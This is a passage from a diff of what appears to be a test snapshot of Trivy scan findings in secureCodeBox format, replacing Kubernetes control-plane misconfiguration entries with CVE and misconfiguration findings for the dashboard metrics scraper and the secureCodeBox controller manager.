"https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0022", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, - "category": "Misconfiguration", - "description": "Rotate log files on reaching 100 MB or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", - "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0022", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2092793", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/2161274", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455635", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455717", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56350", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.3.8", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/442235", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56152", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV003", "installedVersion": undefined, "packageName": undefined, @@ -53716,9 +53883,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "name": "Default capabilities not dropped(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should add 'ALL' to 'securityContext.capabilities.drop')", "references": [ { "type": "URL", @@ -53734,36 +53901,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV011", "installedVersion": undefined, "packageName": undefined, @@ -53774,9 +53912,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "name": "CPU not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.cpu')", "references": [ { "type": "URL", @@ -53792,7 +53930,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV012", "installedVersion": undefined, "packageName": undefined, @@ -53803,9 +53941,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "name": "Runs as root user(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsNonRoot' to true)", "references": [ { "type": "URL", @@ -53821,28 +53959,28 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, ], "severity": "LOW", @@ -53850,7 +53988,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV016", "installedVersion": undefined, "packageName": undefined, @@ -53861,9 +53999,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "name": "Memory requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.memory')", "references": [ { "type": "URL", @@ -53879,7 +54017,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV018", "installedVersion": undefined, "packageName": undefined, @@ -53890,9 +54028,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "name": "Memory not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.memory')", "references": [ { "type": "URL", @@ -53908,7 +54046,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV020", "installedVersion": undefined, "packageName": undefined, @@ -53919,9 +54057,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "name": "Runs with low user ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", @@ -53937,7 +54075,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV021", "installedVersion": undefined, "packageName": undefined, @@ -53948,9 +54086,9 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "name": "Runs with low group ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", @@ -53966,36 +54104,7 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", "id": "KSV106", "installedVersion": undefined, "packageName": undefined, @@ -54006,7 +54115,7 @@ commonly used by applications.", }, "category": "Misconfiguration", "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ @@ -54023,145 +54132,87 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0033", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", + "foundIn": "Target: 'manager' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-28948", + "installedVersion": "v3.0.0-20220512140231-539c8e751b99", + "packageName": "gopkg.in/yaml.v3", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0033", + "https://access.redhat.com/security/cve/CVE-2022-28948", + "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "https://github.com/go-yaml/yaml/issues/666", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "https://security.netapp.com/advisory/ntap-20220923-0006/", + "https://www.cve.org/CVERecord?id=CVE-2022-28948", ], }, - "category": "Misconfiguration", - "description": "Activate garbage collector on pod termination, as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", - "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "category": "Vulnerability", + "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": undefined, + "name": "crash when attempting to deserialize invalid input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0033", + "value": "https://avd.aquasec.com/nvd/cve-2022-28948", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-28948", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0034", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0034", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0034", + "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0038", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0038", - ], - }, - "category": "Misconfiguration", - "description": "Enable kubelet server certificate rotation on controller-manager.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", - "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0038", + "value": "https://github.com/go-yaml/yaml/issues/666", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], "severity": "LOW", @@ -54169,57 +54220,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", ], }, "category": "Misconfiguration", - "description": "Enforcing 